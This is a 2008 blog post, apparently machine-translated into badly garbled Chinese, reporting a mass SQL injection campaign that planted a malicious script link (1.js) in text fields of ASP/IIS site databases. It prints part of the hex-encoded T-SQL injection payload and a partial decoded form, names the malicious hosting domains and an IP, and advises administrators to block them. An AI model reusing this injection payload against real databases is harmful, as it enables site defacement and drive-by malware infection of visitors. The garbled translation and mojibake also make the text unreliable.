许多SQL射入

我本星期初出版了a 岗位关于一个弱点在微软视窗的几个版本…
…好弱点现在被执行那里是去在哪些的许多SQL射入另一个圆传染了跑在IIS平台的成千上万的网站。

预先形成简单的Google搜寻恶意剧本结果的踪影完全成功 510,000修改过的页.

与越来越使用SQL后端也使他们更加快速和更加动态的网站，它手段核实是关键的什么信息得到存放或请求由那些数据库-，特别是如果您允许用户上装一直发生以论坛、blogs，反馈形式等的内容。 除非那数据消毒，在它得到之前保存了您不可能控制什么网站将显示对用户。 这是什么SQL射入所有是，利用弱点在这些控制。

当前注射的恶意文件是1.js然而必须注意到它，这可能改变在任何个阶段。 访客到这个网站是†œtreated†到8不同盘剥为许多窗口基于应用包括目标， RealPlayer和iTunes。 不要因为您是非常可能得到传染，参观站点链接对这个站点。 Trendmicro命名了它注意密码并且通过他们回到contollerâ ™s ip的€malware toj_agent.KAQ。

射入代码象这样在这种情况下开始(笔记，这不是完全代码) ：

   DECLARE%20@S%20NVARCHAR (4000); SET%20@S=CAST (0x440045004300
 Â Â Â 4C00410052004500200040005400200076006100720063006800610072
 Â Â Â 00280032003500350029002C0040004300200076006100720063006800
 Â Â Â 610072002800320035003500290020004400450043004C004100520045
 Â Â Â 0020005400610062006C0065005F0043007500720073006F0072002000
 Â Â Â 43005500520053004F005200200046004F0052002000730065006C0065
 Â Â Â 0063007400200061002E006E0061006D0065002C0062002E006E006100
 Â Â Â 6D0065002000660072006F006D0020007300790073006F0062006A0065
 Â Â Â 00630074007300200061002C0073007900730063006F006C0075006D00
 Â Â Â 6E00730020006200200077006800650072006500200061002E00690064
 Â Â Â 003D0062002E0069006400200061006E006400200061002E0078007400
 Â Â Â 7900700065003D00270075002700200061006E0064002000280062002E
 Â Â Â 00780074007900700065003D003900390020006F007200200062002E00
    780074007900700065003D003300350020006†¦

，当解码时成为：

  Â宣称varchar的@T (255) ‘@C varchar (255)宣称Table_Cursor
 Â Â Â游标为精选的a.name'b.name从sysobjects a'syscolumns b
 Â Â Â a.id=b.id和a.xtype='u和的地方(b.xtype=99或b.xtype=35
   Â或b†¦

结果什么发生？ 它在数据库发现所有文本领域并且增加链接到恶意Java语言到将做您的网站自动地显示他们的他们中的每一个。 那么根本上什么发生了是攻击者寻找了包含querystring的(动态价值例如文章ID，产品号，和cetera)参量的任何类型ASP或ASPX页并且设法使用那上装他们的SQL射入代码。

到目前为止三个不同领域用于主持恶意美满的— nmidahena.com， aspder.com 并且 nihaorr1.com. 有得到从这些站点装载试图使用不同的盘剥安装一个网上赌博特洛伊人的一套文件。 现在最初的盘剥页在所有领域是不能进入的，但那可能改变。 So if you’re a firewall administrator we recommend you to block access to them.

I would recommend that Administrators block access to hxxp:/www.nihaorr1.com and the IP it resolves to 219DOT153DOT46DOT28 at the edge or border of your network.

Info sourced from f-secure

Popularity: 3%

Written by Patrick S. Read more great feeds at is source WEBSITE
no comments.
Read more articles on otherSoftware and MS News.

• [+] Digg: Feature this article
• [+] Del.icio.us: Bookmark this article
• [+] Furl: Bookmark this article

Related articles

• How to install Live Mesh client on non-US systems (April 26th, 2008)
• XP Service Pack 3 (April 26th, 2008)
• Check out Windows Speech Recognition Macros (April 26th, 2008)
• Taking a Closer Look at the Origami Experience 2.0 (April 26th, 2008)
• Windows Server, SQL Server & Visual Studio Launch 2008 Resources (April 25th, 2008)